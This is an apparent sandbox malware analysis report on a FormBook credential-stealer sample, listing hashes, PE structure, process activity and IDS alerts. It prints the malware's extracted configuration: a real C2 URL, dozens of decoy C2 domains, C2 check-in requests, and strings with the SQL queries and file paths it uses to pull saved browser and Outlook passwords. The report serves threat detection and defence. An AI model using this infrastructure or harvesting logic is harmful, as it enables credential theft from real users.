File name: | a2b43ba6d6a6af9f0fa07cab1a1ffd64 |
Full analysis: | https://app.any.run/tasks/f0561eef-2ba4-483d-acc9-6883842992c7 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer distributed as Malware-as-a-Service (MaaS). FormBook differs from much competing malware in its extreme ease of use, which lets even inexperienced threat actors operate it. |
Analysis date: | December 05, 2022, 20:24:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive |
MD5: | A2B43BA6D6A6AF9F0FA07CAB1A1FFD64 |
SHA1: | 0D63EE2545439DFF61486E040FB8D921BEE79AE3 |
SHA256: | 9A67166C5A81302300022D5FCF029600356460FCF3CE82FA37DB08B131A0459F |
SSDEEP: | 6144:LBnmyK4O/ekC2y6gPWJ6OC4tp8k4Hg2Y5nkjtPPraKFMP4wzSl7dlP7O/9Dj:Q7e6gPPOCm8kSIsPWK2Ptzo7dpy |
Extension | File type (%) |
---|---|
.exe | Win32 Executable MS Visual C++ (generic) (67.4) |
.dll | Win32 Dynamic Link Library (generic) (14.2) |
.exe | Win32 Executable (generic) (9.7) |
.exe | Generic Win/DOS Executable (4.3) |
.exe | DOS Executable Generic (4.3) |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 2015-Dec-27 05:38:52 |
Detected languages: | |
e_magic: | MZ |
---|---|
e_cblp: | 144 |
e_cp: | 3 |
e_crlc: | - |
e_cparhdr: | 4 |
e_minalloc: | - |
e_maxalloc: | 65535 |
e_ss: | - |
e_sp: | 184 |
e_csum: | - |
e_ip: | - |
e_cs: | - |
e_ovno: | - |
e_oemid: | - |
e_oeminfo: | - |
e_lfanew: | 216 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
NumberofSections: | 5 |
TimeDateStamp: | 2015-Dec-27 05:38:52 |
PointerToSymbolTable: | - |
NumberOfSymbols: | - |
SizeOfOptionalHeader: | 224 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 4096 | 23626 | 24064 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.41076 |
.rdata | 28672 | 4446 | 4608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.14255 |
.data | 36864 | 110712 | 1536 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.22522 |
.ndata | 151552 | 32768 | 0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | |
.rsrc | 184320 | 206648 | 206848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.67313 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.6686 | 67624 | UNKNOWN | English - United States | RT_ICON |
2 | 4.20636 | 38056 | UNKNOWN | English - United States | RT_ICON |
3 | 4.21554 | 26600 | UNKNOWN | English - United States | RT_ICON |
4 | 4.24892 | 21640 | UNKNOWN | English - United States | RT_ICON |
5 | 4.08716 | 16936 | UNKNOWN | English - United States | RT_ICON |
6 | 7.95631 | 15974 | UNKNOWN | English - United States | RT_ICON |
7 | 4.49335 | 9640 | UNKNOWN | English - United States | RT_ICON |
8 | 4.55083 | 4264 | UNKNOWN | English - United States | RT_ICON |
9 | 5.02221 | 2440 | UNKNOWN | English - United States | RT_ICON |
10 | 4.96191 | 1128 | UNKNOWN | English - United States | RT_ICON |
Imports |
---|
ADVAPI32.dll |
COMCTL32.dll |
GDI32.dll |
KERNEL32.dll |
SHELL32.dll |
USER32.dll |
ole32.dll |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
868 | "C:\Users\admin\AppData\Local\Temp\a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe" | C:\Users\admin\AppData\Local\Temp\a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | | Explorer.EXE | User: admin; Integrity Level: MEDIUM; Exit code: 2 |
492 | "C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe" C:\Users\admin\AppData\Local\Temp\rjyyjwcs.j | C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe | — | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
2564 | "C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe" | C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe | — | ycayuhnew.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3664 | "C:\Windows\System32\rundll32.exe" | C:\Windows\System32\rundll32.exe | Formbook | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3564 | /c del "C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe" | C:\Windows\System32\cmd.exe | — | rundll32.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
912 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | — | | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |

Formbook config: | PID 3664, rundll32.exe |
C2: | www.ym2668.top/8rmt/ |
Decoy C2 (64): | 3472cc.com takecareyourhair.com kontolajigasd21.xyz daihaitrinh.net syncmostlatestinfo-file.info lovesolutionsastrologist.info angelapryan.com rio727casino.com jjsgagets.com devyatkina.online thegoldenbeautyqatar.com czytaj-unas24live.monster timepoachers.com gayxxxporn.site 72308.xyz kristanolivo.com hijrahfwd.com bmfighters.com alfamx.website handfulofbabesbows.com nationalsocialism.link mega-recarga-arg.com rytstack.com kfav77.xyz rrexec.net linetl.top freedomcleaningusa.com abofahad3478.tokyo teamvalvolineeurope.com kyty4265.com afrikannaland.info dharmatradinguae.com bqylc.buzz lifeprojectmanager.pro streeteli.site 68fk.vip wasemanntrucking.com auracreitarusblog.com dfgzyt.cyou tecnotuto.net ookkvip.com 247repairs.info tyvwotnmrlpjgl.biz courtneymporter.com gildainterior.com papiska.xyz sparrow.run tyh-group.com april-zodiac-sign.info kiaf1.site cooleyes.live partasa.com connecticutinteriors.com thelovehandles.us netinseg.website diaryranch.xyz serenaderange.com milano.icu vapeseasy.com hengruncosmetics.com vlashon.com masberlian.ink djayadiwangsa.store nicneni.xyz |
Strings (79): | USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate dat= f-start f-end |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\dxlnbanzq.e | binary | F6710918E3ECDBA55AA451FB1B08742D | CC573825ABA59339F11629B7FE1ED9ADF098E5F12004F441948FE45FCC12A5A7 |
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\nsg9915.tmp | binary | 99DBE321B839C5C8611FCF92D591D4B3 | 093C821C9C687A401316AD33232533EE8D71BCC8A768F6BBAE6D10686F8A9F33 |
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\rjyyjwcs.j | binary | 45CBFD24B9943772008F524A20E0A56F | AFEF884E713661B15D8639AC7268B667742EBE67B0E031E7D617F2DD2D5813FF |
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe | executable | D3749F4E6710B8D5BEB987F07A5E8580 | EDFA8CF65BBE6A0AD70CFC86A451B4AC86D034EFC77F4E117151FAA48AF2D73F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
912 | Explorer.EXE | GET | 410 | 3.64.163.50:80 | http://www.kiaf1.site/8rmt/?LnJL=Drw+5op+ENV0iYqxo8M7C5N0S+6MRM94/NrVrmq26mmPDOavBy4xzBZqerrVpLizXmCFCw==&jPh8=KnJHvh | US | html | 108 b | malicious |
912 | Explorer.EXE | GET | 403 | 23.227.38.74:80 | http://www.streeteli.site/8rmt/?LnJL=gDBz1LMvaRAn16UL/TmQ59mIs755h3wczlOLkLbFqqJke4iY2LTYbrsZzKAEVkVzUYfKdg==&jPh8=KnJHvh | CA | html | 5.03 Kb | malicious |
912 | Explorer.EXE | GET | 301 | 188.114.97.3:80 | http://www.ym2668.top/8rmt/?LnJL=pR67c+KOD4QUEFVHl1o9/L5k9VWq5eUb2FdFXw4R7kp/J3UeEjbGljkaWpuPR6UQ7uKBaQ==&jPh8=KnJHvh | US | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
912 | Explorer.EXE | 188.114.97.3:80 | www.ym2668.top | CLOUDFLARENET | NL | malicious |
912 | Explorer.EXE | 3.64.163.50:80 | www.kiaf1.site | AMAZON-02 | DE | malicious |
912 | Explorer.EXE | 23.227.38.74:80 | www.streeteli.site | CLOUDFLARENET | CA | malicious |
Domain | IP | Reputation |
---|---|---|
www.kiaf1.site | | malicious |
www.streeteli.site | | malicious |
www.masberlian.ink | | unknown |
www.ym2668.top | | malicious |
PID | Process | Class | Message |
---|---|---|---|
912 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
912 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |